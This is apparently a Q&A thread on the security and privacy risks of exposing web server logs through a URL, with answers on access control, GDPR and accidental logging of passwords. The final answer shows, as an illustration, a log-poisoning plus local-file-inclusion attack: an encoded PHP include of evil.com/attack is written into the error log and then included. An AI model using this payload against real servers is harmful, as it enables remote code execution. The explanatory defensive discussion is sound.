44

Accessing web server log files via a URL has a certain appeal, as it provides easy access. But what are the security risks of allowing open access to log files?

Ola Eldøy
  • 557
  • 1
  • 4
  • 7
  • 19
    This might be a bit broad to answer, since it depends heavily on both what it logged, and what is considered sensitive by the company doing the logging. For example, a log of HTTP statuses other than 200 could be sensitive in some cases (shows potential flaws in a site), but doesn't contain anything directly sensitive. – Matthew Dec 06 '18 at 09:37
  • 9
    One security risk is that some inept developer decided to use GET requests for everything including the login page. – MonkeyZeus Dec 06 '18 at 14:33
  • 21
    Also, keep in mind that this may disclose what IP's have connected to your web server, which might violate local privacy laws. – Austin Hemmelgarn Dec 06 '18 at 20:05
  • 3
    The risks far outweigh the appeal on this one... one thing nobody's mentioned is not only can the stack trace show technologies in play, it also exposes the architecture of the system including sensitive spots such as login and authorization. – RandomUs1r Dec 07 '18 at 19:04
  • 3
    One of the biggest risks would be to expose data which you are not allowed to share with the general public. Think IP addresses and GDPA, for example. You need to provide a privacy statement along with a reason why you process that data and whatnot, blah blah blah. Now... you _publish_ that data accessible by anyone... I don't think this will work without attracting trouble. – Damon Dec 07 '18 at 19:29
  • What @AustinHemmelgarn and Damon said. Logs contain vast amounts of privacy-infringing data. – R.. GitHub STOP HELPING ICE Dec 10 '18 at 04:21
  • In my past experience as a java server developer, I have previously witnessed credit card details in server logs. In a large or growing corporation, there is no accounting for what junior developers may do. – Stewart Dec 10 '18 at 07:04

8 Answers8

84

There are clearly 2 different lines of defense here.

First, highly sensitive data (secrets, typically passwords) should never be logged to avoid compromise through logs.

But the more an attacker knows about a system, the higher the risk to build/use a targetted attack. For example software versions are not highly sensitive and can reasonably feed a log, but they can help in choosing an attack vector.

So the second line of defense is that someone that does not need access to the logs should not be able to read them. That is a direct application of the least privilege rule.

It is common to provide log access to the dev/maintenance team, but you should evaluate the risk/gain ratio, according to your access security tools. The most secure system is the one that cannot be accessed by any user, but its useability is very low too...

Serge Ballesta
  • 25,636
  • 4
  • 42
  • 84
  • 9
    I thought "compromission" was a typo, but TIL its a real word meaning "the act or action of jeopardizing (as one's moral or ethical principles)" – Criggie Dec 06 '18 at 23:01
  • 4
    While highly sensitive data should never be logged, it does happen by error sometimes. That should obviously be addressed if it's happening on your system, but the consequences of that mistake are far greater if the logs are publicly exposed. – Zach Lipton Dec 06 '18 at 23:03
  • 9
    Any logfile that logs user names risks displaying passwords too if a user assumes they are being prompted for their password when in fact it has reverted to the user name prompt. Every now an then I realised I had done just that and wondered if my password had been logged. – PJTraill Dec 07 '18 at 00:11
  • 2
    Your fourth paragraph is quite important and I think clarifies how some people misunderstand security. Just because you want to "avoid security by obscurity" doesn't mean you should advertise potential attack vectors. – corsiKa Dec 07 '18 at 03:10
  • 1
    @Criggie: it was indeed a typo (English is not my first language). Would *compromise* be better here? – Serge Ballesta Dec 07 '18 at 07:38
  • Sadly, many log files (Microsoft logon I'm looking at you!) fail to hide sensitive information because they fundamental design doesn't consider user input error. Suppose you accidentally type (Windows login screen) your username, then the keyboard fails to send , you type your password: the log file now has name+password in plaintext. Security holes abound because designers don't think. ninja'd by @Hugh Meyers' comment on next answer. – Carl Witthoft Dec 07 '18 at 13:54
  • 1
    Though highly sensitive data shouldn't be in logs, it does sometimes happen anyway. For example I have in the past implemented integration between two web applications. Due to design choices in the web application I wasn't responsible for we had to receive secrets from that system through URL parameters which would naturally end up in our web server logs. More common examples involve one time secrets being used in URLs for certain validation purposes. There is also the possibility of logs containing PII. – kasperd Dec 07 '18 at 16:15
29

Access to raw log data should be restricted to authorized users.

The simple reason for that is that even when under normal operating conditions your applications may should not log any data too sensitive to expose (and opinions/regulations on what that is exactly may differ) there almost certainly will come a time when your logs do contain sensitive data:

  • Unless you're extremely familiar with your applications you don't beforehand know what detail will get logged when the application throws errors or exceptions.
    Most applications are designed to restrict the amount of detail in error messages they present to end users but will log (much) more detail in their logs to help admins and developers troubleshoot the cause of those errors and exceptions.

  • You may need to increase the log verbosity for troubleshooting to such a level that logs will contain sensitive details that would normally get suppressed.

  • As people commented: people entering passwords for login names and developers using the GET method rather then POST and a myriad of similar human errors may result in otherwise much more innocuous fields in log events getting "polluted" with sensitive data.


There are products that will allow you to grant authenticated users web based access and set ACL's to either only aggregated reports, sanitized/filtered log data and/or all raw log events such as Splunk, Kibana and similar.

And although access to raw log data should be restricted you can still decide to publish more publicly either a sanitized subset of your logs or the reports that you would generate based on the logs, i.e. publish a usage report and visitor statistics rather than the raw access log

HBruijn
  • 1,345
  • 10
  • 12
  • 26
    An additional example: I have sometimes typed my password into the wrong field. I'm probably not the only person ever to do that. Thus sensitive information can wind up in a place that would not normally be sanitized. +1 for some good advice. – Hugh Meyers Dec 06 '18 at 14:11
  • 3
    @HughMeyers I'm constantly surprised by how many users put their credit card number in cardholder name fields. – user2752467 Dec 06 '18 at 19:47
  • 2
    @JustinLardinois I’ve never done that. What trips me up are the screens that usually remember your login name and just ask for your password. Every so often they forget my login name and prompt for it. If I’m on autopilot, I just type my password and hit enter and the form gets submitted. Bad UI design but I kick myself for being careless. Every so often form auto-fillers get something wrong as well so I never use them. – Hugh Meyers Dec 06 '18 at 19:55
  • @JustinLardinois not surprising - different sites have the cardholder name and the card number *swapped*. And the two fields are usually of similar size. So you might default to entering data in the wrong field on a screen with a different layout. Throw in the fact that when entering this information people are focused on their *card* not the screen and once they finish the data entry they are interested if the information they just entered is *correct*, rather than *is it in the correct field*. Plenty of such screens are badly designed aside from the inherent problems, too. – VLAZ Dec 07 '18 at 08:17
  • @vlaz I agree with you that card entry interfaces are often poorly designed. But I wonder what the user is thinking when they put their card number in both fields, which is the only way the transaction could have their number in the name field and still go through. – user2752467 Dec 07 '18 at 21:37
  • @JustinLardinois probably something along the lines of "It let me proceed, so I won't bother correcting it". I'd chalk it up to bad design again - ideally it would prevent you (probably softly) from having the same data in both fields. The form could also be a lot clearer about which field is which - for example, one form I saw recently had a picture of a blank card next to the form and when you had the focus on a field, it highlighted the part of the card which would have that information. Once you entered information, it would put it over the image of the card, too. – VLAZ Dec 08 '18 at 10:25
19

It has more points of view:

1) By not hiding logs, you expose your infrastructure.

2) EU has a GDPR. Exposing IP's, names, e-mails or anything personal is prohibited. (and at least immoral and bad behaviour) gdpr-info.eu/art-32-gdpr

If you need to show the logged data to third party or an easy access use dedicated tool. In my office it's graylog for example. You can easily harvest the logs, store them and control access to them.

Ondřej Kolín
  • 291
  • 1
  • 5
  • 1
    "unmoral" -> "immoral". It's too short of a correction, and I can't edit the post. – VLAZ Dec 07 '18 at 08:19
  • 2
    You may want to reference article 32 of the GDPR, which requires you to implement appropriate organizational and technical measures to safeguard personal data. https://gdpr-info.eu/art-32-gdpr/ – Johannes Brodwall Dec 10 '18 at 20:07
8

The vulnerabilities that may arise from the types of information written to log files is enumerated as CWE-532 in the Common Weakness Enumeration database.

Information written to log files can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information.

The issue of protected, personally-identifiable information is also quite relevant, as addressed in @KOLEGA's answer above.

7

Even if you don't intentionally log sensitive information, sometimes it can be logged inadvertently.

For instance, suppose you log the username of failed logins. Sometimes people accidentally type their password into the username field, and this will then be logged.

It's best to treat logs as potentially containing information that should be protected, even if you don't normally consider it sensitive.

Barmar
  • 584
  • 3
  • 9
4

Log files should be located on a safe location by default in general. Log files can contain IP address, emails, and law protected information. So my recommendation is always keeps the log files on a safe location. On the other hand, in some cases these log files are used for forensic purposes and you should protect modification of them if possible, this depends a bit on your system.

camp0
  • 2,172
  • 1
  • 10
  • 10
3

Like Serge Ballesta said, sensitive information (usernames, passwords, etc.) should really never be put in a log file.

The main real security concern that comes out of having publicly accessible log files comes from gaining information about your system, especially if you are using publicly available software (not developed for that unique system).

If I'm attempting to gain access to your system, one thing I might check FIRST is your log files. If I'm able to discern what software your system is running, and even more importantly, what VERSION of that software is being used, I can narrow down my search for exploits drastically. Maybe you haven't updated your software to the most recent version, there is a bug in the old version that allows me to use SQL injection, and there is a line in your log that states the current software version being used.

It's about the same level of a security risk as using open source code. It just makes it a tad easier for an attacker to find exploits. Food for thought.

ethayng
  • 31
  • 1
2

Some good answers here - but not complete.

Yes, potentially your log files may contain sensitive data, hence that data should be explicitly restricted to those users who are authorized to access it. Sadly my experience is that most organizations which implement this kind of control, grossly misjudge the number of people whom should be authorized.

But another important point is that your users control a lot of the data which subsequently appears in the log files. Depending on the system architecture of your application, this can provide a mechanism for leveraging a local file inclusion vulnerability into a full exploit. Consider:

 GET /nonesuch%3C%3Finclude%20'http://evil.com/attack';%3F%3E
 GET /vulnerable.php?file=/var/log/httpd/error_log

This may be mitigated by how your webserver handles the encoding of the request on input and when writing to log files (but is it completely watertight?). If you allow the webserver to access the log file location directly via a URL, then the escalation mechanism is slightly different.

(Note that in the example above, if it is possible to invoke a remote include, then that will likely be possible across all the code, hence persisting the exploit in the log file is redundant - but this is just for illustration purposes, more complex exploits can be written)

symcbean
  • 18,278
  • 39
  • 73